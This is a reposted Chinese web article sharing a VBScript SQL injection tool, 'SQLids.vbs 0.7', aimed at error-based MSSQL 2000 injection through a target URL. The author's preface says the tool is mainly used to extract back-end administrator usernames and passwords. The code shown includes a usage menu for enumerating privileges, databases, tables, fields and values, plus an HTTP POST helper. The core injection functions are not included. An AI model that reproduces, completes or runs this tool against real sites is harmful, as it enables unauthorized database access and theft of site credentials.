SQLids.vbs 0.7(最终版，以后改成gui界面的)

2019-10-26 18:02:37

字体：大中小

来源：转载

供稿：网友

是有这个问题的。
第一，应当用正则判断较好。
第二，我用循环加返回结果大于30个长度就退出循环，我相信没有表名和字段名大于30个字母的，但是字段值有可能大于，这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码，所以就放弃了。
复制代码代码如下:

set arg=wscript.arguments

If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If

Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式，直接写url为数字型，写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "//www.jb51.net/article/14172.htm"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名库名表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function

Function UrlEncode(str)
str = Replace(str," ","%20")
UrlEncode = str
End Function

Function GetBody(url)' xml得到网页源码，可以改成cookie或get提交
On Error Resume Next
Aurl=Split(url,"?") '这是为post提交的
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'post提交
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function

上一篇：利用WMI实现系统补丁检测分析

下一篇：WMI 脚本高手不完全手册

发表评论

共有条评论